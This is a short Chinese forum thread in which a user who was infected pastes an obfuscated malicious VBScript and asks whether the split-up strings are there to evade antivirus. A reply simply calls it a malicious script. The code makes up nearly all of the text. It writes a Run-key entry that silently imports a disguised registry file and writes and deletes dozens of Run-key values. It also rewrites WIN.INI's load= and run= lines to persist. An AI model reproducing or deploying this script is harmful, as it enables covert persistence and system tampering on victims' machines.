BYR Achieve · 镜像论坛

Set sss = CreateObject("WSc" + "ript.Sh" + "ell") mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\" mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\" mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\" sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer" sss.RegWrite ""&mhk&"internat.exe","internat.exe" sss.RegWrite ""&mhk&"zwupdows","12" sss.RegWrite ""&mhk&"win","12" sss.RegWrite ""&mhk&"mwin","12" sss.RegWrite ""&mhk&"internt","12" sss.RegWrite ""&mhk&"Inernet","12" sss.RegWrite ""&mhk&"Internet","12" sss.RegWrite ""&mhk&"iexpleror","12" sss.RegWrite ""&mhk&"zxdows","12" sss.RegWrite ""&mhk&"qwe","12" sss.RegWrite ""&mhk&"win1","12" sss.RegWrite ""&mhk&"intelnat.exe","12" sss.RegWrite ""&mhk&"u1888","12" sss.RegWrite ""&mhk&"intenet","12" sss.RegWrite ""&mhk&"9i5zxdows","12" sss.RegWrite ""&mhk&"9i5com01zxdows","12" sss.RegWrite ""&mhk&"99zxdows","12" sss.RegWrite ""&mhk&"88zxdows","12" sss.RegWrite ""&mhk&"Start Pagewin","12" sss.RegWrite ""&mhk&"Start Page","12" sss.RegWrite ""&mhk&"u188","12" sss.RegWrite ""&mhk&"9i5comzxdows","12" sss.RegWrite ""&mhk&"9q5zxdows","12" sss.RegWrite ""&mhk&"u1881","12" sss.RegWrite ""&mhk&"u1882","12" sss.RegWrite ""&mhk&"u1883","12" sss.RegWrite ""&mhk&"u1884","12" sss.RegWrite ""&mhk&"u1885","12" sss.RegWrite ""&mhk&"u1886","12" sss.RegWrite ""&mhk&"u1887","12" sss.RegWrite ""&mhk&"u88y", "12" sss.RegWrite ""&mhk&"flash", "12" sss.RegWrite ""&mhk&"999izxdows","12" sss.RegWrite ""&mhk&"033zxdows","12" sss.RegWrite ""&mhk&"syste","12" sss.RegWrite ""&mhc&"my","12" sss.RegWrite ""&mhk&"3zxdows","12" sss.RegWrite ""&mhk&"88u88","12" sss.RegWrite ""&mhk&"system","12" sss.RegWrite ""&mhk&"8zxdows","12" sss.RegWrite ""&mhk&"u18","12" sss.RegWrite ""&mhk&"interneet.exe","12" sss.RegWrite ""&mhk2&"RunOnce\", "12" sss.RegWrite ""&mhk&"iexpler", "12" sss.RegWrite ""&mhk&"u1810", "12" sss.RegWrite ""&mhk&"winwin", "12" sss.RegWrite ""&mhk&"WIN32", "12" sss.RegWrite ""&mhk&"W1N32", "12" sss.RegDelete ""&mhc&"" sss.RegDelete ""&mhk&"zwupdows" sss.RegDelete ""&mhk&"win" sss.RegDelete ""&mhk&"mwin" sss.RegDelete ""&mhk&"internt" sss.RegDelete ""&mhk&"inernet" sss.RegDelete ""&mhk&"Internet" sss.RegDelete ""&mhk&"u188" sss.RegDelete ""&mhk&"iexpleror" sss.RegDelete ""&mhk&"zxdows" sss.RegDelete ""&mhk&"qwe" sss.RegDelete ""&mhk&"win1" sss.RegDelete ""&mhk&"intelnat.exe" sss.RegDelete ""&mhk&"intenet" sss.RegDelete ""&mhk&"9i5zxdows" sss.RegDelete ""&mhk&"9i5com01zxdows" sss.RegDelete ""&mhk&"99zxdows" sss.RegDelete ""&mhk&"88zxdows" sss.RegDelete ""&mhk&"Start Pagewin" sss.RegDelete ""&mhk&"Start Page" sss.RegDelete ""&mhk&"9i5comzxdows" sss.RegDelete ""&mhk&"9q5zxdows" sss.RegDelete ""&mhk&"999izxdows" sss.RegDelete ""&mhk&"033zxdows" sss.RegDelete ""&mhk&"u1881" sss.RegDelete ""&mhk&"u1882" sss.RegDelete ""&mhk&"u1883" sss.RegDelete ""&mhk&"u1884" sss.RegDelete ""&mhk&"u1885" sss.RegDelete ""&mhk&"u1886" sss.RegDelete ""&mhk&"u1887" sss.RegDelete ""&mhk&"u88y" sss.RegDelete ""&mhk&"flash" sss.RegDelete ""&mhk&"88u88" sss.RegDelete ""&mhk&"interneet.exe" sss.RegDelete ""&mhk&"u18" sss.RegDelete ""&mhk&"u1888" sss.RegDelete ""&mhk&"system" sss.RegDelete ""&mhk&"3zxdows" sss.RegDelete ""&mhk&"8zxdows" sss.RegDelete ""&mhk&"syste" sss.RegDelete ""&mhk2&"RunOnce\" sss.RegDelete ""&mhk&"iexpler" sss.RegDelete ""&mhk&"u1810" sss.RegDelete ""&mhk&"winwin" sss.RegDelete ""&mhk&"WIN32" sss.RegDelete ""&mhk&"W1N32" Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject") myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI") if myfile14 then set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI") mywin=FSO2.ReadALL() l=Instr(mywin,"run=")-3 m=Instr(mywin,"load=")-1 n=Instr(mywin,"NullPort=")-3 FSO2.close if l>0 and m>0 and l>m then set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI") mywin2=FSO3.Read(l) FSO3.close set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI") mywin3=FSO4.Read(m) FSO4.close if n>0 and n>l then set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI") mywin4=FSO5.Read(n) FSO5.close mywin=Replace(mywin,mywin4,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.WriteLine "load=" FSO2.Write "run=" FSO2.Write mywin FSO2.close else mywin=Replace(mywin,mywin2,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.Write "load=" FSO2.Write mywin FSO2.close end if end if end if 中招了，顺便看了看，眼花啊。。。。。。顺便问问，这种写法是为了躲杀毒软件么？

一个恶意脚本。。。。。。